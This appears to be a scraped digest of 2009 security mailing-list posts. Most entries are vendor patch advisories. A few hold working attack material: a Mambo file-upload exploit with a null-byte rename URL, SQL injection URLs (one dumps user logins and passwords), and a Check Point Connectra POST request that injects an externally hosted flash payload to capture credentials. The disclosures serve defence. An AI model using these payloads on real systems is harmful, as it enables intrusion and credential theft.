[ GLSA 200909-19 ] Dnsmasq: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200909-19 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Dnsmasq: Multiple vulnerabilities Date: September 20, 2009 Bugs: #282653 ID: 200909-19 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities in Dnsmasq might result in the remote execution of arbitrary code, or a Denial of Service. Background == Dnsmasq is a lightweight, easy to configure DNS forwarder and DHCP server. It includes support for Trivial FTP (TFTP). Affected packages = --- Package / Vulnerable / Unaffected --- 1 net-dns/dnsmasq2.5.0= 2.5.0 Description === Multiple vulnerabilities have been reported in the TFTP functionality included in Dnsmasq: * Pablo Jorge and Alberto Solino discovered a heap-based buffer overflow (CVE-2009-2957). * An anonymous researcher reported a NULL pointer reference (CVE-2009-2958). Impact == A remote attacker in the local network could exploit these vulnerabilities by sending specially crafted TFTP requests to a machine running Dnsmasq, possibly resulting in the remote execution of arbitrary code with the privileges of the user running the daemon, or a Denial of Service. NOTE: The TFTP server is not enabled by default. Workaround == You can disable the TFTP server either at buildtime by not enabling the tftp USE flag, or at runtime. Make sure --enable-tftp is not set in the DNSMASQ_OPTS variable in the /etc/conf.d/dnsmasq file and enable-tftp is not set in /etc/dnsmasq.conf, either of which would enable TFTP support if it is compiled in. Resolution == All Dnsmasq users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =net-dns/dnsmasq-2.5.0 References == [ 1 ] CVE-2009-2957 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2957 [ 2 ] CVE-2009-2958 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2958 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200909-19.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: PGP signature
Mambo 4.6.3 arbitrary file upload
Step 1) Using post method send file to: http://victim.com/mambo4.6.5/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=FileUpload file should have one of the following extensions: zip, doc, xls, pdf, rtf, csv, jpg, gif, jpeg, png, avi, mpg, mpeg, swf, fla POC: form action=http://victim.com/mambo4.6.5/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=FileUpload; method=post enctype=multipart/form-data input type=file name=NewFile/input input type=submit value=submit/input /form Step 2) Using known bug in this version of mambo rename that file. POC: http://victim.com/mambo4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=FileUploadfile=afile[NewFile][name]=myscript.php%00.jpgfile[NewFile][tmp_name]=/home/victim/victim.com/UserFiles/File/abc.giffile[NewFile][size]=1CurrentFolder= path to UserFiles you can get using another known bug which is described here: http://www.securityfocus.com/archive/1/archive/1/487128/100/200/threaded
Dawaween V 1.03 ----SQL Injection Exploit
Discovered By: Dazz Email: dazz.b...@hotmail.com Script : Dawaween V 1.03 Search: Powered by Dawaween V 1.03 http://www.example.com//poems/poems.php?division=secaction=listid=[sql] WebSite : http://wwe.hostwq.net
rubrique 'rubrique.php' SQL Injection Vulnerability
= Discovered By: CrAzY CrAcKeR Email: CrAzY_CrAcKeR(at)hotmail(dot)com example:- http://www.example.info/rubrique.php?id=-1+union+select+1,2,us_login,us_password,5,6,7,8,9,10,11,12,13,14+from+a_users_f
[ MDVSA-2009:236 ] firefox
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:236 http://www.mandriva.com/security/ ___ Package : firefox Date: September 20, 2009 Affected: 2009.0, 2009.1, Enterprise Server 5.0 ___ Problem Description: Security issues were identified and fixed in firefox 3.0.x: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 3.0.14 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors (CVE-2009-3069, CVE-2009-3070, CVE-2009-3071, CVE-2009-3072). Multiple unspecified vulnerabilities in the JavaScript engine in Mozilla Firefox before 3.0.14 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors (CVE-2009-3073, CVE-2009-3074, CVE-2009-3075). Mozilla Firefox before 3.0.14 does not properly implement certain dialogs associated with the (1) pkcs11.addmodule and (2) pkcs11.deletemodule operations, which makes it easier for remote attackers to trick a user into installing or removing an arbitrary PKCS11 module (CVE-2009-3076). Mozilla Firefox before 3.0.14 does not properly manage pointers for the columns (aka TreeColumns) of a XUL tree element, which allows remote attackers to execute arbitrary code via a crafted HTML document, related to a dangling pointer vulnerability. (CVE-2009-3077). Visual truncation vulnerability in Mozilla Firefox before 3.0.14 allows remote attackers to trigger a vertical scroll and spoof URLs via unspecified Unicode characters with a tall line-height property (CVE-2009-3078). Unspecified vulnerability in Mozilla Firefox before 3.0.14 allows remote attackers to execute arbitrary JavaScript with chrome privileges via vectors involving an object, the FeedWriter, and the BrowserFeedWriter (CVE-2009-3079). This update provides the latest Mozilla Firefox 3.0.x to correct these issues. Additionally, some packages which require so, have been rebuilt and are being provided as updates. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3069 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3070 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3071 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3072 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3073 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3074 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3075 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3076 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3077 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3078 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3079 http://www.mozilla.org/security/known-vulnerabilities/firefox30.html#firefox3.0.14 ___ Updated Packages: Mandriva Linux 2009.0: b4c6aca6c5c261e213f418f429ac03ac 2009.0/i586/beagle-0.3.8-13.16mdv2009.0.i586.rpm 152a2110ff5aa55b2cc9749a234928fc 2009.0/i586/beagle-crawl-system-0.3.8-13.16mdv2009.0.i586.rpm 713e0eba09cb4327eaa084fdc021c67b 2009.0/i586/beagle-doc-0.3.8-13.16mdv2009.0.i586.rpm bc54c79d99577e9a874651453ad2c01e 2009.0/i586/beagle-epiphany-0.3.8-13.16mdv2009.0.i586.rpm dfc6ff1c006b69097335d9f6d7c8b0c9 2009.0/i586/beagle-evolution-0.3.8-13.16mdv2009.0.i586.rpm 0c23a53935beb61fcca33c9ac994f762 2009.0/i586/beagle-gui-0.3.8-13.16mdv2009.0.i586.rpm b0f6fa240aff3bfc73b8024a0275437c 2009.0/i586/beagle-gui-qt-0.3.8-13.16mdv2009.0.i586.rpm 2368ba4306af1fba3b477434294590b4 2009.0/i586/beagle-libs-0.3.8-13.16mdv2009.0.i586.rpm ae1681d195bc9fb6b7ce8dc47c6702f9 2009.0/i586/devhelp-0.21-3.10mdv2009.0.i586.rpm e7a4d4ef7b7f58a9f8d41fc7aaae9e12 2009.0/i586/devhelp-plugins-0.21-3.10mdv2009.0.i586.rpm 9f02eb2dc8c11ea94cb850486141c201 2009.0/i586/epiphany-2.24.0.1-3.12mdv2009.0.i586.rpm 0e9f9d67efed43af964b7082b50de5ec 2009.0/i586/epiphany-devel-2.24.0.1-3.12mdv2009.0.i586.rpm 59732effce5e40701d9152bc540cd831 2009.0/i586/firefox-3.0.14-0.1mdv2009.0.i586.rpm 7a1371ca23327aecead0469457577f50 2009.0/i586/firefox-af-3.0.14-0.1mdv2009.0.i586.rpm 4e08e64387e331534dac0442f5789d11 2009.0/i586/firefox-ar-3.0.14-0.1mdv2009.0.i586.rpm b77c17c5461ba624ec35a872b3bded3f 2009.0/i586/firefox-be-3.0.14-0.1mdv2009.0.i586.rpm 4d46d71ce7f43a10b11f17f4f786897c 2009.0/i586/firefox-bg-3.0.14-0.1mdv2009.0.i586.rpm 44ec0824741ea8c5d0f27042bb92e7b2 2009.0/i586/firefox-bn-3.0.14-0.1mdv2009.0.i586.rpm b148c2edf49d03d806a30c70bcb27660
[SECURITY] [DSA 1890-1] New wxwidgets packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1890-1 secur...@debian.org http://www.debian.org/security/ Giuseppe Iuculano September 19, 2009http://www.debian.org/security/faq - Packages : wxwindows2.4 wxwidgets2.6 wxwidgets2.8 Vulnerability : integer overflow Problem type : remote Debian-specific: no CVE Id : CVE-2009-2369 Tielei Wang has discovered an integer overflow in wxWidgets, the wxWidgets Cross-platform C++ GUI toolkit, which allows the execution of arbitrary code via a crafted JPEG file. For the oldstable distribution (etch), this problem has been fixed in version 2.4.5.1.1+etch1 for wxwindows2.4 and version 2.6.3.2.1.5+etch1 for wxwidgets2.6. For the stable distribution (lenny), this problem has been fixed in version 2.6.3.2.2-3+lenny1 for wxwidgets2.6 and version 2.8.7.1-1.1+lenny1 for wxwidgets2.8. For the testing distribution (squeeze), this problem will be fixed soon. For the unstable distribution (sid), this problem has been fixed in version 2.8.7.1-2 for wxwidgets2.8 and will be fixed soon for wxwidgets2.6. We recommend that you upgrade your wxwidgets packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Debian (oldstable) - -- Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/w/wxwidgets2.6/wxwidgets2.6_2.6.3.2.1.5+etch1.dsc Size/MD5 checksum: 1070 122f76e514a09e27a2efeb83972508bf http://security.debian.org/pool/updates/main/w/wxwindows2.4/wxwindows2.4_2.4.5.1.1+etch1.tar.gz Size/MD5 checksum: 11008448 56e09f548341a24faab4e2494ccf3c2e http://security.debian.org/pool/updates/main/w/wxwindows2.4/wxwindows2.4_2.4.5.1.1+etch1.dsc Size/MD5 checksum: 1088 956079f1b2e0639fdd5edab2112c528a http://security.debian.org/pool/updates/main/w/wxwidgets2.6/wxwidgets2.6_2.6.3.2.1.5+etch1.tar.gz Size/MD5 checksum: 15785194 de6ed02cb129ce6393d132452999cd17 Architecture independent packages: http://security.debian.org/pool/updates/main/w/wxwidgets2.6/wx2.6-i18n_2.6.3.2.1.5+etch1_all.deb Size/MD5 checksum: 664476 ab249de067119db66091ecc4a4412d35 http://security.debian.org/pool/updates/main/w/wxwidgets2.6/python-wxtools_2.6.3.2.1.5+etch1_all.deb Size/MD5 checksum:17782 f176eaeafccacf0b965c68d3b61a0253 http://security.debian.org/pool/updates/main/w/wxwidgets2.6/wx2.6-examples_2.6.3.2.1.5+etch1_all.deb Size/MD5 checksum: 3633304 e2b5d8c1c0edcd2287a35a327576ebdd http://security.debian.org/pool/updates/main/w/wxwidgets2.6/wx2.6-doc_2.6.3.2.1.5+etch1_all.deb Size/MD5 checksum: 1252698 cb859a2500031b5cd6d4397f7bfd5eb3 http://security.debian.org/pool/updates/main/w/wxwindows2.4/wx2.4-i18n_2.4.5.1.1+etch1_all.deb Size/MD5 checksum: 372546 988d0727d645d9c75f4ae8509abd719b http://security.debian.org/pool/updates/main/w/wxwidgets2.6/python-wxversion_2.6.3.2.1.5+etch1_all.deb Size/MD5 checksum:21782 a704638d51c4ef98ec5a2f9473ae68a7 http://security.debian.org/pool/updates/main/w/wxwindows2.4/wx2.4-doc_2.4.5.1.1+etch1_all.deb Size/MD5 checksum: 1076678 e6271674af7b940be14ebfb52e23b92d http://security.debian.org/pool/updates/main/w/wxwindows2.4/wx2.4-examples_2.4.5.1.1+etch1_all.deb Size/MD5 checksum: 2709008 c7028e976a32f5244ebb27693db064c6 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/w/wxwindows2.4/python-wxgtk2.4_2.4.5.1.1+etch1_alpha.deb Size/MD5 checksum: 2713910 ba15f692945dbefedb47bae998f013c3 http://security.debian.org/pool/updates/main/w/wxwindows2.4/libwxbase2.4-dev_2.4.5.1.1+etch1_alpha.deb Size/MD5 checksum:25074 21e8730a7006310d0a84c407e4f2ae0e http://security.debian.org/pool/updates/main/w/wxwindows2.4/wx2.4-headers_2.4.5.1.1+etch1_alpha.deb Size/MD5 checksum: 564238 2370397d7591b72fc7609ce02f7f4f84 http://security.debian.org/pool/updates/main/w/wxwidgets2.6/libwxgtk2.6-dbg_2.6.3.2.1.5+etch1_alpha.deb Size/MD5 checksum: 19992954 db418cf6e2847b9907ef6a538f70adcc http://security.debian.org/pool/updates/main/w/wxwidgets2.6/wx-common_2.6.3.2.1.5+etch1_alpha.deb Size/MD5 checksum:50328 be45b6149b0c116e803fdd38e5572cef
[UPRSN] Ubuntu Privacy Remix 9.04r2 fixes security issues
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ### UPR Security Notice UPRSN-09_01 September 19, 2009 several vulnerabilities ### Ubuntu Privacy Remix (UPR), based on Ubuntu 9.04, is a live, read-only CD that seals off your private data from the outside world to offer protection against spying measures such as the german „Bundestrojaner“, with which the German government and federal police tries to spy on its citizens. UPR does this using encryption and isolation methods. This method of booting off a read-only CD provides a isolated and unmodifiable system that is exceedingly difficult to compromise by spyware. The following security issues affect the Ubuntu Privacy Remix releases prior 9.04_r2. Ubuntu Privacy Remix 9.04_r2 can be downloaded from https://www.privacy-cd.org/ Please note that all files are signed with the *new signing key* 2E887042. A. UPR-specific - --- The UPR Team has released the second stable release of Ubuntu Privacy Remix 9.04, which includes a new kernel to fix USN-819-1 (local root privilege escalation). We think that this hole is very difficult to exploit under the UPR environment, nevertheless we recommend all users to use the new version. B. Security Updates adopted from Ubuntu - --- All packages with security-fixes in Ubuntu 9.04 until 09/01/2009 have been updated. See the complete changelog (new functions and features, bugfixes) here: https://www.privacy-cd.org/en/using-upr/download - -- - - Ubuntu Privacy Remix Project web:www.privacy-cd.org mail: i...@privacy-cd.org bugreports: https://bugs.launchpad.net/upr signing_key:1E8E7D6A | Fingerprint: C87A 673C 4EDD F7CC 5C89 4B77 7AC5 2496 1E8E 7D6A communication_key: 85AC2E72 | Fingerprint: 83A9 0DE1 17B1 F74B 8E1A 0353 29E6 DD3E 85AC 2E72 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFKtRQGKebdPoWsLnIRAjhMAKDPO3EZZDipUeCts6YCWy9+wnI3PQCg03W7 IsvZWAULGOuASFJLCQAF9LA= =o4xA -END PGP SIGNATURE-
[scip_Advisory 4020] Check Point Connectra R62 Login Script Injection Vulnerability
Check Point Connectra R62 Login Script Injection Vulnerability
scip AG Vulnerability ID 4020 (09/04/2009)
http://www.scip.ch/?vuldb.4020
I. INTRODUCTION
Check Point Connectra is a so-called SSL-VPN solution, which allows
users to access a remote system using a regular web browser.
More information is available on the official product web site at the
following URL[1]:
http://www.checkpoint.com/products/connectra/index.html
II. DESCRIPTION
Stefan Friedli at scip AG (Switzerland) found an input validation error
within the current release, which enabled an attacker to perform various
web-based attacks.
The initial logon script at /Login/Login, that is being used for
unauthenticated users to log in, fails to perform proper input
validation on the data that is being submitted via HTTP POST. While
certain fields are escaped before being sent back to users browser, the
parameter vpid_prefix lacks any validation and is therefore vulnerable
to script injection.
Other parts of the application might be affected too.
This vulnerability has been tested on version R62, other versions might
be affected as well.
III. EXPLOITATION
Classic script injection techniques and unexpected input data within a
browser session can be used to exploit these vulnerabilities. The target
application does actually check for certain patterns and prevents an
attacker from using easy exploiting strings containing substrings like
script, javascript, alert or similar. However, we consider this to
be an imperfect mechanism that is unable to prevent an attack using a
more sophisticated payload. For a selection, you might want to check
RSnakes popular XSS Cheat Sheet[2], which contains several patterns not
being detected by the filter in place, allowing you execute any
arbitrary, externally hosted payload.
We exploited the vulnerability for a customer in order to proof the
possibility to capture usernames and passwords. One of the possibilities
mentioned above is, to embed a remote flash file and grant it the
permission to execute script code.
Vulnerable Variable Value:
vpid_prefix = embed/src=http://www.scip.ch/p/s/w/ccs.swf;
allowScriptAccess=alwaysa name=
--- CUT ---
POST https://TARGET:443/Login/Login HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2)
Gecko/20090729 Firefox/3.5.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://TARGET/Login/Login?LangCode=
Cookie: CheckCookieSupport=1; ICSCookie=***purged***; user_locale=en_US
Content-Type: application/x-www-form-urlencoded
Content-length: 153
loginType=StandarduserName=vpid_prefix=embed/src=http://www.scip.c
h/p/s/w/ccs.swf
allowScriptAccess=alwaysa name=
password=HeightData=1147Login=Sign+In
--- CUT END ---
Response Snippet:
--- CUT ---
input type=hidden id=vpid_prefix name=vpid_prefix
value=embed/src=http://www.scip.ch/p/s/w/ccs.swf;
allowScriptAccess=alwaysa name=
--- CUT END ---
IV. IMPACT
Because non-authenticated parts of the software are affected, this
vulnerability is serious for every secure environment. Non-authenticated
users might be able to exploit this flaw to gain elevated privileges in
the target environment (e.g. extracting sensitive cookie information or
login information) or to perform any other form of web-based attacks.
Due to the fact that the application will often be allowed to make use
of ActiveX, it can also be used as a springboard to inject other
payloads, for example MS09-037[3] or any other vulnerability disclosed
lately, that might be exploited using a web browser.
Because other parts of the application might be affected too - this
could include some second order vulnerabilities - a severe attack
scenario might be possible.
V. DETECTION
Detection of web based attacks requires a specialized web proxy and/or
intrusion detection system. Patterns for such a detection are available
and easy to implement. Usually the mathematical or logical symbols for
less-than () and greater-than () are required to propose a HTML tag.
In some cases single (') or double quotes () are required to inject the
code in a given HTML statement. Some implementation of security systems
are looking for well-known attack tags as like script and attack
attributes onMouseOver too. However, these are usually not capable of
identifying highly optimized payload.
VI. SOLUTION
Check Point provides a hotfix for the vulnerability which should be
installed on vulnerable systems
VII. VENDOR RESPONSE
Check Point acknowledged the problem and provides a hotfix for the
vulnerability.
Detailed information on the issue, maintained by Check Point, can be
found at:
https://supportcenter.checkpoint.com/supportcenter/portal?solutionid=sk4
2793
VIII. SOURCES
scip AG - Security Consulting Information Process (german)
http://www.scip.ch/
scip AG Vulnerability
[USN-834-1] PostgreSQL vulnerabilities
=== Ubuntu Security Notice USN-834-1 September 21, 2009 postgresql-8.1, postgresql-8.3 vulnerabilities CVE-2009-3229, CVE-2009-3230, CVE-2009-3231 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: postgresql-8.1 8.1.18-0ubuntu0.6.06 Ubuntu 8.04 LTS: postgresql-8.3 8.3.8-0ubuntu8.04 Ubuntu 8.10: postgresql-8.3 8.3.8-0ubuntu8.10 Ubuntu 9.04: postgresql-8.3 8.3.8-0ubuntu9.04 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: It was discovered that PostgreSQL could be made to unload and reload an already loaded module by using the LOAD command. A remote authenticated attacker could exploit this to cause a denial of service. This issue did not affect Ubuntu 6.06 LTS. (CVE-2009-3229) Due to an incomplete fix for CVE-2007-6600, RESET ROLE and RESET SESSION AUTHORIZATION operations were allowed inside security-definer functions. A remote authenticated attacker could exploit this to escalate privileges within PostgreSQL. (CVE-2009-3230) It was discovered that PostgreSQL did not properly perform LDAP authentication under certain circumstances. When configured to use LDAP with anonymous binds, a remote attacker could bypass authentication by supplying an empty password. This issue did not affect Ubuntu 6.06 LTS. (CVE-2009-3231) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-8.1_8.1.18-0ubuntu0.6.06.diff.gz Size/MD5:31743 f1ea9c55604f2fd24de05451cce47fba http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-8.1_8.1.18-0ubuntu0.6.06.dsc Size/MD5: 1130 aa7100459f8bfb6a6c1e65250213f144 http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-8.1_8.1.18.orig.tar.gz Size/MD5: 11515037 34911f0a3e8ef5d1bd46f67cf96692fb Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-doc-8.1_8.1.18-0ubuntu0.6.06_all.deb Size/MD5: 1516114 63827e2e232f05749c3a141b8e8c0c5a amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg-compat2_8.1.18-0ubuntu0.6.06_amd64.deb Size/MD5: 185844 3ffe4f092b07e7b6514f8bd53b2f75ad http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg-dev_8.1.18-0ubuntu0.6.06_amd64.deb Size/MD5: 379106 b07081cb872c95062cd63583e57b394a http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg5_8.1.18-0ubuntu0.6.06_amd64.deb Size/MD5: 206676 9328e1e1b2d3961bb1b05cf48d937411 http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libpgtypes2_8.1.18-0ubuntu0.6.06_amd64.deb Size/MD5: 207656 f85b64b5ba668e1100b4199d6dff1329 http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libpq-dev_8.1.18-0ubuntu0.6.06_amd64.deb Size/MD5: 341486 66ab11dab2367caa538a6265bef90cca http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libpq4_8.1.18-0ubuntu0.6.06_amd64.deb Size/MD5: 239602 82b1f147e74384912b3459ddc53a6067 http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-8.1_8.1.18-0ubuntu0.6.06_amd64.deb Size/MD5: 3189146 99384e42c8c34d957e4e29917f70839c http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-client-8.1_8.1.18-0ubuntu0.6.06_amd64.deb Size/MD5: 816672 1f5219ab375080eb51b3733a979182b8 http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-contrib-8.1_8.1.18-0ubuntu0.6.06_amd64.deb Size/MD5: 648688 dde36069f684fc305ac979a3a1762c05 http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-plperl-8.1_8.1.18-0ubuntu0.6.06_amd64.deb Size/MD5: 202698 ca02926acf9a81ea28e60feefaf0f6ab http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-plpython-8.1_8.1.18-0ubuntu0.6.06_amd64.deb Size/MD5: 196632 c1d43c12ecaad0bad094066e7280a1a4 http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-pltcl-8.1_8.1.18-0ubuntu0.6.06_amd64.deb Size/MD5: 196766 275742992921ca2b93aba4c0a5210d35 http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-server-dev-8.1_8.1.18-0ubuntu0.6.06_amd64.deb Size/MD5: 631704 2ef854bd649dec4b9fb0cb0db2d99481 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg-compat2_8.1.18-0ubuntu0.6.06_i386.deb Size/MD5: 184712
[ MDVSA-2009:237 ] openssl
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:237 http://www.mandriva.com/security/ ___ Package : openssl Date: September 21, 2009 Affected: Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0 ___ Problem Description: Multiple vulnerabilities was discovered and corrected in openssl: ssl/s3_pkt.c in OpenSSL before 0.9.8i allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a DTLS ChangeCipherSpec packet that occurs before ClientHello (CVE-2009-1386). The NSS library library before 3.12.3, as used in Firefox; GnuTLS before 2.6.4 and 2.7.4; OpenSSL 0.9.8 through 0.9.8k; and other products support MD2 with X.509 certificates, which might allow remote attackers to spooof certificates by using MD2 design flaws to generate a hash collision in less than brute-force time. NOTE: the scope of this issue is currently limited because the amount of computation required is still large (CVE-2009-2409). This update provides a solution to these vulnerabilities. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1386 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2409 ___ Updated Packages: Corporate 3.0: 52c4eef7e013ff51da821c9739f8455c corporate/3.0/i586/libopenssl0.9.7-0.9.7c-3.11.C30mdk.i586.rpm ee8c84605e6073baa7ba8f7a2583688f corporate/3.0/i586/libopenssl0.9.7-devel-0.9.7c-3.11.C30mdk.i586.rpm c4644081608a0322998acaff8aeb7855 corporate/3.0/i586/libopenssl0.9.7-static-devel-0.9.7c-3.11.C30mdk.i586.rpm 613010dc703d61de93bfad8ccc91cc67 corporate/3.0/i586/openssl-0.9.7c-3.11.C30mdk.i586.rpm 141b07323226c91355ccb28f0ad93f97 corporate/3.0/SRPMS/openssl-0.9.7c-3.11.C30mdk.src.rpm Corporate 3.0/X86_64: 37a8fb11191834bd7e45ec4ccb3cdeb8 corporate/3.0/x86_64/lib64openssl0.9.7-0.9.7c-3.11.C30mdk.x86_64.rpm 9fd74f7123edae69f4bb674d35b96ef8 corporate/3.0/x86_64/lib64openssl0.9.7-devel-0.9.7c-3.11.C30mdk.x86_64.rpm 247b548bbbc772c69a3c1cc54e350d90 corporate/3.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7c-3.11.C30mdk.x86_64.rpm 779e9ac5fffaf96141be8ea77f963e83 corporate/3.0/x86_64/openssl-0.9.7c-3.11.C30mdk.x86_64.rpm 141b07323226c91355ccb28f0ad93f97 corporate/3.0/SRPMS/openssl-0.9.7c-3.11.C30mdk.src.rpm Corporate 4.0: 92833c7613875f935a0ac42c1ee22328 corporate/4.0/i586/libopenssl0.9.7-0.9.7g-2.10.20060mlcs4.i586.rpm 6ca9508b8769fe3e0f7e25a9aa73d82d corporate/4.0/i586/libopenssl0.9.7-devel-0.9.7g-2.10.20060mlcs4.i586.rpm ec80b2ccb7231f71fcf81cc200985d88 corporate/4.0/i586/libopenssl0.9.7-static-devel-0.9.7g-2.10.20060mlcs4.i586.rpm efa7973f515618a3bc77f1ee8969a982 corporate/4.0/i586/openssl-0.9.7g-2.10.20060mlcs4.i586.rpm 4953a1c50fcbebc06d4ef46832155029 corporate/4.0/SRPMS/openssl-0.9.7g-2.10.20060mlcs4.src.rpm Corporate 4.0/X86_64: 271634c0d8e82fe4a3302c04dc7d6e87 corporate/4.0/x86_64/lib64openssl0.9.7-0.9.7g-2.10.20060mlcs4.x86_64.rpm 72f2b3717cd75ab119323252e3b89e5b corporate/4.0/x86_64/lib64openssl0.9.7-devel-0.9.7g-2.10.20060mlcs4.x86_64.rpm 2fb0977d4a4fce2466c05cabf64f56a6 corporate/4.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7g-2.10.20060mlcs4.x86_64.rpm 1a10542aec4bc4bfa97064c081d89f06 corporate/4.0/x86_64/openssl-0.9.7g-2.10.20060mlcs4.x86_64.rpm 4953a1c50fcbebc06d4ef46832155029 corporate/4.0/SRPMS/openssl-0.9.7g-2.10.20060mlcs4.src.rpm Multi Network Firewall 2.0: 52c4eef7e013ff51da821c9739f8455c mnf/2.0/i586/libopenssl0.9.7-0.9.7c-3.11.C30mdk.i586.rpm ee8c84605e6073baa7ba8f7a2583688f mnf/2.0/i586/libopenssl0.9.7-devel-0.9.7c-3.11.C30mdk.i586.rpm c4644081608a0322998acaff8aeb7855 mnf/2.0/i586/libopenssl0.9.7-static-devel-0.9.7c-3.11.C30mdk.i586.rpm 613010dc703d61de93bfad8ccc91cc67 mnf/2.0/i586/openssl-0.9.7c-3.11.C30mdk.i586.rpm 141b07323226c91355ccb28f0ad93f97 mnf/2.0/SRPMS/openssl-0.9.7c-3.11.C30mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date
[Suspected Spam][USN-835-1] neon vulnerabilities
